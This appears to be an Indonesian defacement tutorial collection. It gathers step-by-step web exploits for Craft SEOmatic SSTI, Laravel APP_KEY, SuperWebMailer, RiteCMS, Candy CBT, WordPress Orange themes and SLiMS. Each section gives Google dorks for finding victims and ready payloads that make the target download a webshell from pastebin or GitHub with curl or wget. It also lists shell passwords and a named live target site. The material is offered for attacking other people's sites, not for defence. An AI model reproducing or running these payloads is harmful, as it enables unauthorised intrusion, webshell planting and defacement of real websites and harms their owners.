(Server-Side Template Injection) + (RCE)

 

Deface Poc SSTI to RCE

(Server-Side Template Injection) +  (Remote Code Execution)

Exploit : /actions/seomatic/meta-container/all-meta-containers?uri=

RCE Code = 

{{craft.app.view.evaluateDynamicContent(%27print(system(%22curl\x20https://pastebin.com/raw/1Wg3u06u\x20%3E\x20x.php%22));%27)}}

Itu link pastebin nya bisa lu ganti ke punya lu

Nama file = x.php
Password = aryaganteng

dork : site:*/humans.txt intext:SEOmatic

Paham ga kontol

https://weblo.com/actions/seomatic/meta-container/all-meta-containers?uri=

Kasih kode rce nya di belakang uri=
Seperti ini.

https://weblo.com/actions/seomatic/meta-container/all-meta-containers?uri={{craft.app.view.evaluateDynamicContent(%27print(system(%22curl\x20https://pastebin.com/raw/1Wg3u06u\x20%3E\x20x.php%22));%27)}}

Akses Shell

Site.com/namashell.php

Live Target :
https://www.shopmoment.com/actions/seomatic/meta-container/all-meta-containers?uri=

Lebih jelas lagi.
https://youtu.be/nGjv-P_hhHg

Contact : ncdream72@gmail.com

Laravel RCE APP_KEY

 Laravel RCE via Web Apps

1.Masuk ke https://exploit.anons79.com/

2.Masukkan target (perhatikan penggunaan www,http,dan https)

3.Masukkan APP_KEY yang kalian dapat

4.Masukkan command (kalo saya seringkali dengan ls)

5.Klik exploit

Jika kalian ini melakukan backconnect kalian bisa menggunakan command disini

*note:

Tidak semua APP_KEY pada laravel yang rentan terhadap ini, bisa saja hanya karna perbedaan versi Laravel... 

Laravel RCE via terminal ( CLI )
download tools

wget https://raw.githubusercontent.com/wibuheker/exploit/master/php/laravel/rce.php 
kemudian jalankan toolsnya

php rce.php url=http://target.com/ method=1

Source : nakanosec

Contact : ncdream72@gmail.com

Unauthentication RCE SuperWebMailer

Unauthentication RCE SuperWebMailer

Dork :
inurl:/swm/defaultnewsletter.php

Tools :
https://github.com/Aryaalfahrezi010/RCE_SuperWebMailer

Shell:
https://raw.githubusercontent.com/linuxsec/indoxploit-shell/master/shell-v3.php Pass IndoXploit


Oke pertama kita dorking dulu seperti biasa

Pilih web yg lo mau terserah
Nah Habis Itu lu hapus bagian defaultnewsletter.php

jadi (https://sitelu.com/swm)

habis itu lu install tools nya gblk

pakek python3 ya itu jangan lupa

python3 exploit.py -u https://sitelu/swm/
Nanti kalo vuln ada tulisannya kyak dibwh ini

Habis itu command rce nya

wget https://raw.githubusercontent.com/linuxsec/indoxploit-shell/master/shell-v3.php

Btw itu gua pakek mini shell karna shell tdi ga supp ama web w

Tinggal Akses dah

https://sitelo.com/swm/shell-v3.php

Contact : ncdream72@gmail.com

RiteCMS 2.2.1 - Authenticated Remote Code Execution

RiteCMS 2.2.1 - Authenticated Remote Code Execution

Vendor Homepage: http://ritecms.com/

Version: 2.2.1

Dork:

intext:"Powered By RiteCMS"

1- Go to following url. >> http://(HOST)/cms/

2- Default username and password is admin:admin. We must know login credentials.

3- Go "Filemanager" and press "Upload file" button.

4- Choose your php webshell script and upload it.

shell access?http://target.com/media/yourshell.php

Ref? Rite Cms

Contact : ncdream72@gmail.com

Deface PoC Computer Based Test RCE

 

Deface Poc Computer Based Test RCE

Dork:
"Support By Candy CBT"
"Support By Candy CBT"+"Login"
"Candy CBT"+"Login"
(Kembangin lagi gann...)

# Exploit #
-admin/ifm.php

jika saat di masukan Exploit nya malah redirect ke halaman admin/login.php

Maka itu tandanya vuln.

# Kode Rce #
curl http://targetkalian.com/admin/ifm.php -d 'api=remoteUpload&dir=&filename=D.php&method=curl&url=https://pastebin.com/raw/Vsaj9aS3'

Nama shell nya D.php bsa lu ganti sesuka hati lo

Akses Shell?
http://linktarget.com/files/namashell.php

contact : ncdream72@gmail.com

Deface WordPress Orange Themes

 

Deface WordPress Orange Themes

Dork : 

- inurl:/wp-content/themes/kernel-theme

- inurl:/wp-content/themes/bordeaux-theme

- inurl:/wp-content/themes/bulteno-theme

- inurl:/wp-content/themes/rayoflight-theme

Exploit :

/functions/upload-handler.php

Crsf Online :

https://blogpongo.com/csrf.php

Kalian Dorking Dulu di google

Pilih Salah Satu Web/Target Tambahin Exploitnya

Vuln?= Ada bacaan Error

Lalu Kalian Bukan Csrfnya

Masukkan Url

Contoh :

https://sitetarget.com/wp-content/themes/kernel-theme/functions/upload-handler.php

Post File : orange_themes

Kemudian Klik Submit Nah Terus Upload Shell/Sc Lu Kalo Sukses Nanti Keluar Nama File Kalian

Location File?:/wp-content/uploads/[tahun]/[bulan]/file lu

contoh :

https://sitetarget.com/wp-content/uploads/2020/02/sht.html

contact : ncdream72@gmail.com

Slims command injection Upload Shell

Slims command injection Upload Shell

Google Dorks :

- inurl:/index.php?p=show_detail&id= 

- "Detail Cantuman" site:ac.id 

- "Powered By Slims7" site:ac.id

Payload:

/lib/watermark/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%2075%20-interlaceline%20file.jpg%20jpeg:file.jpg%20;wget%20https://raw.githubusercontent.com/backdoorhub/shell-backdoor-list/master/shell/php/mini.php;%20&phpThumbDebug=9

taruh payload dimana om?

terget.com/payload

target.com/path/payload

Akses Shell:

https/target.com/lib/watermark/mini.php

contact me :ncdream72@gmail.com

sumber:

https://exploit.zone-dark.com/multiple-web-vulnerablities-pada-slims7-rce-xss-csrf/

https://www.bandung6etar.my.id/2020/09/deface-cms-slims-command-injection.html